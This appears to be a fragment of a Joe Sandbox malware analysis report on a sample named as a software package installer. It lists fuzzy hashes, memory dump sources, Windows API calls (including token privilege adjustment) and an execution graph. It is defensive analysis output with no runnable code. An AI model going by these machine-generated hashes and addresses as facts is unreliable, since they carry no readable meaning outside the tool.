                          • Opcode Fuzzy Hash: 539104bcd2e18d39e03ac55c58518a6a8fb11d925aae62a5d94a47fe6a2efcd5
                          • Instruction Fuzzy Hash: 6901FC327145256FCB058F79CD4989E7B79EB86734B2C4208F415DBA80EB75D98187A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: <J$DJ$HJ$TJ$]
                          • API String ID: 0-686860805
                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                          • Instruction ID: 733562d43fb60f69c92c33810097cd83a92cd807374fca5223bfe4aeda7fd10e
                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                          • Instruction Fuzzy Hash: CE41A270C05349AFCF14DBB2E7908EEB774AF11208B64C16AD02167E91EB35A6CDCB51
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID:
                          • API String ID: 3732870572-0
                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                          • Instruction ID: 24c707fea7c88df5bdb315a6dca10b1b16020f07d2499f2a7a7c6385c3ed8bce
                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                          • Instruction Fuzzy Hash: 5711E7762003447FEB248AA6DC54EAFBBBDEFC9744F10881DF14252E50DA71AC88D7A0
                          APIs
                          • GetLastError.KERNEL32(00000008,?,00000000,6CA27273), ref: 6CA237D7
                          • _free.LIBCMT ref: 6CA23834
                          • _free.LIBCMT ref: 6CA2386A
                          • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CA23875
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorLast_free
                          • String ID:
                          • API String ID: 2283115069-0
                          • Opcode ID: 7dc8d301cf26f0e1c20836819000816bdb31c22a9411759c992da51f9bb9b5de
                          • Instruction ID: 2da04b910941de51146decd2572ca30d1500defd9b0ad84f8cf852f96ecb6417
                          • Opcode Fuzzy Hash: 7dc8d301cf26f0e1c20836819000816bdb31c22a9411759c992da51f9bb9b5de
                          • Instruction Fuzzy Hash: F211A37230A6216E9B015AB94D8996A256DEBC33BC73D0724F16587E90EF2ACC8D5110
                          APIs
                          • WriteConsoleW.KERNEL32(00000000,?,6CA3350C,00000000,00000000,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0), ref: 6CA34CF1
                          • GetLastError.KERNEL32(?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?,6CA29EF0,?,6CA2AB3C,6CA348D6), ref: 6CA34CFD
                            • Part of subcall function 6CA34D4E: CloseHandle.KERNEL32(FFFFFFFE,6CA34D0D,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?,6CA29EF0), ref: 6CA34D5E
                          • ___initconout.LIBCMT ref: 6CA34D0D
                            • Part of subcall function 6CA34D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA34CCB,6CA3395E,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?), ref: 6CA34D42
                          • WriteConsoleW.KERNEL32(00000000,?,6CA3350C,00000000,?,6CA33971,00000000,00000001,00000000,6CA29EF0,?,6CA2B0A6,?,?,6CA29EF0,?), ref: 6CA34D22
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: dc8009918c03e244a1beac1a222298ceaa069b80e24975e9adf4b7dfd088faa8
                          • Instruction ID: a9cbd0b1b15b2697892efd1859e08d13cd0d4e8c768fa2e5d60a474a1d65e308
                          • Opcode Fuzzy Hash: dc8009918c03e244a1beac1a222298ceaa069b80e24975e9adf4b7dfd088faa8
                          • Instruction Fuzzy Hash: 8FF01C36600229BBCF522FD1DC099893F36FB0A7E6B088510FA08C6620DA7388659B90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: $SJ
                          • API String ID: 3732870572-3948962906
                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                          • Instruction ID: 3f0499fdd8796800038d21dce9031a1f7801d8c2b655ca540e9272dfe1f792a6
                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                          • Instruction Fuzzy Hash: 16B16EB1D00249DFCB14CF6AC9809AEBBB1FF48318F64862ED555A7B50D730AAC5CB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: H_prolog3_
                          • String ID: 8Q
                          • API String ID: 2427045233-4022487301
                          • Opcode ID: eefdcb50d792f3d85edae2e37e40b844bbe5e24134d88b5214a80cf9e4e1305f
                          • Instruction ID: 31cca1b1b8e718e4dbc6a777a29bf878d2e2ebd9a941325cf3d915dca19a027a
                          • Opcode Fuzzy Hash: eefdcb50d792f3d85edae2e37e40b844bbe5e24134d88b5214a80cf9e4e1305f
                          • Instruction Fuzzy Hash: AB71D634D1522A9BDB108F95C988EFFB679AF45338F1C4316EA2067A90D77988C6C760
                          APIs
                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C8E2A76
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ___std_exception_destroy
                          • String ID: Jbx$Jbx
                          • API String ID: 4194217158-1161259238
                          • Opcode ID: 6e500e0c1cac3fc7f150294dbe7754e57cd865437b49890140fe4c925b12f343
                          • Instruction ID: 42301d5cff854bf15891dc196beb109276e1458a6587e163ea45e990a61d4648
                          • Opcode Fuzzy Hash: 6e500e0c1cac3fc7f150294dbe7754e57cd865437b49890140fe4c925b12f343
                          • Instruction Fuzzy Hash: 095116B1900205CFCB24CF58D984A9EB7B5FF8A314F14896DD849DBB41D335E989CB91
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA334F6), ref: 6CA2BE3B
                          • __dosmaperr.LIBCMT ref: 6CA2BE42
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr
                          • String ID: 8Q
                          • API String ID: 1659562826-4022487301
                          • Opcode ID: 7481122d5b97c2d88c264217630fae5cfc4ffc6a23011c1391bf90b2a1b3979d
                          • Instruction ID: d2b7d8fa3f31708c379db71aa0b38a05ad808fb37dcc581fc23dc891ece93643
                          • Opcode Fuzzy Hash: 7481122d5b97c2d88c264217630fae5cfc4ffc6a23011c1391bf90b2a1b3979d
                          • Instruction Fuzzy Hash: 4E41BB716141B4AFDB118F28E880BE97FF5EF46348F1C4398E9828BA41E3399D95C790
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: 3333
                          • API String ID: 3732870572-2924271548
                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                          • Instruction ID: f1bf1f4671faf801f70e648b471680c19a2e306a8d248195b05ef76bea2ae78f
                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                          • Instruction Fuzzy Hash: 5521BAB09017046FE720CFB98984B5BF6FCEB88714F50891EA586D7B40D77099888765
                          APIs
                          • _free.LIBCMT ref: 6CA2CB69
                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA2945A,?,00000004,?,4B42FCB6,?,?,6CA1E5AC,4B42FCB6,?), ref: 6CA2CBA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: AllocHeap_free
                          • String ID: 8Q
                          • API String ID: 1080816511-4022487301
                          • Opcode ID: 1a1f30844c3e6fdd0eb3edd7d8ec5a648657cf9cad1514574fae8d6ea9314204
                          • Instruction ID: 84a14a7487c054fc662ddaeb302cbe4bbbe89295e5fbe7ba45338cca57b7e662
                          • Opcode Fuzzy Hash: 1a1f30844c3e6fdd0eb3edd7d8ec5a648657cf9cad1514574fae8d6ea9314204
                          • Instruction Fuzzy Hash: 91F0963674613566FB113A36AC04F9B376C9F83A7CB2D4215F81497E80DF2CD5C985A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @ K$DJ$T)K$X/K
                          • API String ID: 0-3815299647
                          • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                          • Instruction ID: 9ce651834a1ec1d6408a9ff73db8cc48fa50d96c10289a3065cd5c2934d12dcd
                          • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                          • Instruction Fuzzy Hash: 0F91E430A053459BDB08DFA4C5507EE77A2AF4130CF148819CCE69BB85DB75A9CECB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: D)K$H)K$P)K$T)K
                          • API String ID: 0-2262112463
                          • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                          • Instruction ID: 1c9bdd99dbb50333d2626a25340791c9349387b977c8d28bbc252f7ae5119b17
                          • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                          • Instruction Fuzzy Hash: D451E4309042499FCF10CFD5D944AEEB771AF1931CF24851AE815A7A81DB7199EEC750
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: &qB$0aJ$A0$XqB
                          • API String ID: 0-1326096578
                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                          • Instruction ID: 90b8915cf1d6a333a422e74401d6658e0af07c8cb4276cde329834b654d90004
                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                          • Instruction Fuzzy Hash: 47218E71D01258EECF05DBE5DA849EDBBB4AF25308F20806AD41667B81DB780E8CCB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: J$0J$DJ$`J
                          • API String ID: 0-2453737217
                          • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                          • Instruction ID: 2484baddb9f2c9242b115bd01482e6932cf53eadf63c4a45d7a12f07639f01f2
                          • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                          • Instruction Fuzzy Hash: 7311C2B0900B64CEC720DF5AC55419AFBE4BFA5708B10C91FC4A787B50D7F8A548CB99

                          Execution Graph

                          Execution Coverage:4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:62
                          execution_graph 73228 217da0 WaitForSingleObject 73229 217dbb GetLastError 73228->73229 73230 217dc1 73228->73230 73229->73230 73231 217ddf 73230->73231 73232 217dce CloseHandle 73230->73232 73232->73231 73233 217dd9 GetLastError 73232->73233 73233->73231 73234 18b5d9 73235 18b5e6 73234->73235 73239 18b5f7 73234->73239 73235->73239 73240 18b5fe 73235->73240 73241 18b608 __EH_prolog 73240->73241 73247 206a40 VirtualFree 73241->73247 73243 18b63d 73248 18764c 73243->73248 73246 181e40 free 73246->73239 73247->73243 73249 187661 73248->73249 73250 187656 CloseHandle 73248->73250 73249->73246 73250->73249 73251 206ba3 VirtualFree 73252 191ade 73253 191ae8 __EH_prolog 73252->73253 73303 1813f5 73253->73303 73256 191b32 6 API calls 73257 191b8d 73256->73257 73267 191bf8 73257->73267 73321 191ea4 9 API calls 73257->73321 73259 191b24 _CxxThrowException 73259->73256 73261 191bdf 73322 1827bb 73261->73322 73265 191c89 73317 191eb9 73265->73317 73267->73265 73329 1a1d73 5 API calls __EH_prolog 73267->73329 73270 191cb2 _CxxThrowException 73270->73265 73304 1813ff __EH_prolog 73303->73304 73330 1a7ebb 73304->73330 73307 181438 73334 181e0c 73307->73334 73310 1814f4 73310->73256 73320 1a1d73 5 API calls __EH_prolog 73310->73320 73313 18144d 73313->73310 73315 181507 73313->73315 73340 181265 5 API calls 2 library calls 73313->73340 73341 1c04d2 73313->73341 73347 181524 malloc _CxxThrowException __EH_prolog ctype 73313->73347 73348 182fec 73315->73348 73356 189313 GetCurrentProcess OpenProcessToken 73317->73356 73320->73259 73321->73261 73323 1827c7 73322->73323 73327 1827e3 73322->73327 73324 181e0c ctype 2 API calls 73323->73324 73323->73327 73325 1827da 73324->73325 73363 181e40 free 73325->73363 73328 181e40 free 73327->73328 73328->73267 73329->73270 73331 1a7ec6 73330->73331 73332 18142b 73330->73332 73331->73332 73333 181e40 free ctype 73331->73333 73332->73307 73339 181212 free ctype 73332->73339 73333->73331 73335 181e1c malloc 73334->73335 73336 181e15 73334->73336 73337 181e2a _CxxThrowException 73335->73337 73338 181e3e 73335->73338 73336->73335 73337->73338 73338->73313 73339->73307 73340->73313 73342 1c04df 73341->73342 73343 1c0513 73341->73343 73344 1c04fd 73342->73344 73345 1c04e8 _CxxThrowException 73342->73345 73343->73313 73354 1c0551 malloc _CxxThrowException free memcpy ctype 73344->73354 73345->73344 73347->73313 73349 182ffc 73348->73349 73350 182ff8 73348->73350 73349->73350 73351 181e0c ctype 2 API calls 73349->73351 73350->73310 73352 183010 73351->73352 73355 181e40 free 73352->73355 73354->73343 73355->73350 73357 18933a LookupPrivilegeValueW 73356->73357 73360 189390 73356->73360 73358 18934c AdjustTokenPrivileges 73357->73358 73359 189382 73357->73359 73358->73359 73361 189372 GetLastError 73358->73361 73362 189385 CloseHandle 73359->73362 73361->73362 73362->73360 73363->73327 73364 1bacd3 73365 1bace0 73364->73365 73366 1bacf1 73364->73366 73365->73366 73370 1bacf8 73365->73370 73372 1bc0b3 __EH_prolog 73370->73372 73371 1bc0ed 73387 181e40 free 73371->73387 73372->73371 73378 1a7193 73372->73378 73386 181e40 free 73372->73386 73374 1baceb 73377 181e40 free 73374->73377 73377->73366 73379 1a719d __EH_prolog 73378->73379 73388 1b2db9 free ctype 73379->73388 73381 1a71b3 73389 1a71d5 free __EH_prolog ctype 73381->73389 73383 1a71bf 73390 181e40 free 73383->73390 73385 1a71c7 73385->73372 73386->73372 73387->73374 73388->73381 73389->73383 73390->73385 73391 1842d1 73392 1842bd 73391->73392 73393 181e0c ctype 2 API calls 73392->73393 73394 1842c5 73392->73394 73393->73394 73398 21ffb1 __setusermatherr 73399 21ffbd 73398->73399 73403 220068 _controlfp 73399->73403 73401 21ffc2 _initterm __getmainargs _initterm __p___initenv 73402 1bc27c 73401->73402 73403->73401 73404 2069f0 free 73405 1ad948 73435 1adac7 73405->73435 73407 1ad94f 73443 182e04 73407->73443 73410 182e04 2 API calls 73411 1ad987 73410->73411 73414 1ad9e7 73411->73414 73446 186404 73411->73446 73416 1ada0f 73414->73416 73433 1ada36 73414->73433 73471 181e40 free 73416->73471 73419 1ad9bf 73469 181e40 free 73419->73469 73420 1ada94 73478 181e40 free 73420->73478 73421 1ada17 73472 181e40 free 73421->73472 73425 1ad9c7 73470 181e40 free 73425->73470 73426 1ada9c 73479 181e40 free 73426->73479 73430 1c04d2 5 API calls 73430->73433 73431 1ad9cf 73433->73420 73433->73430 73473 182da9 73433->73473 73476 181524 malloc _CxxThrowException __EH_prolog ctype 73433->73476 73477 181e40 free 73433->73477 73436 1adad1 __EH_prolog 73435->73436 73437 182e04 2 API calls 73436->73437 73438 1adb33 73437->73438 73439 182e04 2 API calls 73438->73439 73440 1adb3f 73439->73440 73441 182e04 2 API calls 73440->73441 73442 1adb55 73441->73442 73442->73407 73444 181e0c ctype 2 API calls 73443->73444 73445 182e11 73444->73445 73445->73410 73480 18631f 73446->73480 73449 186423 73484 182f88 73449->73484 73450 182f88 3 API calls 73450->73449 73453 197e5a 73454 197e64 __EH_prolog 73453->73454 73550 198179 73454->73550 73457 1a7ebb free 73458 197e7f 73457->73458 73459 182fec 3 API calls 73458->73459 73460 197e9a 73459->73460 73461 182da9 2 API calls 73460->73461 73462 197ea7 73461->73462 73555 186c72 73462->73555 73466 197ecb 73468 197ed8 73466->73468 73657 18757d GetLastError 73466->73657 73468->73414 73468->73419 73469->73425 73470->73431 73471->73421 73472->73431 73829 182d4d 73473->73829 73475 182dc6 73475->73433 73476->73433 73477->73433 73478->73426 73479->73431 73481 189245 73480->73481 73490 1890da 73481->73490 73485 182f9a 73484->73485 73485->73485 73486 182fbe 73485->73486 73487 181e0c ctype 2 API calls 73485->73487 73486->73453 73488 182fb4 73487->73488 73549 181e40 free 73488->73549 73491 1890e4 __EH_prolog 73490->73491 73492 182f88 3 API calls 73491->73492 73494 1890f7 73492->73494 73493 18915d 73495 182e04 2 API calls 73493->73495 73494->73493 73499 189109 73494->73499 73496 189165 73495->73496 73497 1891be 73496->73497 73500 189174 73496->73500 73540 186332 6 API calls 2 library calls 73497->73540 73509 186414 73499->73509 73531 182e47 73499->73531 73503 182f88 3 API calls 73500->73503 73501 18917d 73529 1891ca 73501->73529 73538 18859e malloc _CxxThrowException free _CxxThrowException 73501->73538 73503->73501 73508 18914d 73537 181e40 free 73508->73537 73509->73449 73509->73450 73510 189185 73514 182e04 2 API calls 73510->73514 73511 18912e 73511->73508 73536 1831e5 malloc _CxxThrowException free _CxxThrowException 73511->73536 73515 189197 73514->73515 73516 1891ce 73515->73516 73517 18919f 73515->73517 73519 182f88 3 API calls 73516->73519 73518 1891b9 73517->73518 73539 181089 malloc _CxxThrowException free _CxxThrowException 73517->73539 73541 183199 malloc _CxxThrowException free _CxxThrowException 73518->73541 73519->73518 73522 1891e6 73542 188f57 memmove 73522->73542 73524 1891ee 73525 1891f2 73524->73525 73526 182fec 3 API calls 73524->73526 73544 181e40 free 73525->73544 73528 189212 73526->73528 73543 1831e5 malloc _CxxThrowException free _CxxThrowException 73528->73543 73545 181e40 free 73529->73545 73532 182e57 73531->73532 73546 182ba6 73532->73546 73535 188f57 memmove 73535->73511 73536->73508 73537->73509 73538->73510 73539->73518 73540->73501 73541->73522 73542->73524 73543->73525 73544->73529 73545->73509 73547 181e0c ctype 2 API calls 73546->73547 73548 182bbb 73547->73548 73548->73535 73549->73486 73554 198906 73550->73554 73552 197e77 73552->73457 73554->73552 73658 198804 free ctype 73554->73658 73659 181e40 free 73554->73659 73557 186c7c __EH_prolog 73555->73557 73556 186cd3 73559 186ce2 73556->73559 73561 186d87 73556->73561 73557->73556 73558 186cb7 73557->73558 73560 182f88 3 API calls 73558->73560 73563 182f88 3 API calls 73559->73563 73562 186cc7 73560->73562 73564 182e47 2 API calls 73561->73564 73570 186f4a 73561->73570 73656 181e40 free 73562->73656 73568 186cf5 73563->73568 73565 186db0 73564->73565 73566 182e47 2 API calls 73565->73566 73578 186dc0 73566->73578 73567 186d4a 73677 187b41 28 API calls 73567->73677 73568->73567 73571 186d0b 73568->73571 73574 186fd1 73570->73574 73576 186f7e 73570->73576 73676 189252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73571->73676 73573 186d5f 73584 18764c CloseHandle 73573->73584 73580 1870e5 73574->73580 73581 186fed 73574->73581 73599 18701d 73574->73599 73575 186d36 73575->73567 73577 186d3a 73575->73577 73695 186bf5 11 API calls 2 library calls 73576->73695 73577->73562 73589 186dfe 73578->73589 73678 183221 malloc _CxxThrowException free _CxxThrowException 73578->73678 73660 186868 73580->73660 73697 186bf5 11 API calls 2 library calls 73581->73697 73584->73562 73586 186f85 73586->73580 73587 186f99 73586->73587 73595 182f88 3 API calls 73587->73595 73588 186fca 73594 186848 FindClose 73588->73594 73590 186e43 73589->73590 73603 186e1e 73589->73603 73592 186c72 42 API calls 73590->73592 73591 187006 73591->73588 73596 186e4e 73592->73596 73594->73562 73598 186fb0 73595->73598 73600 186f3a 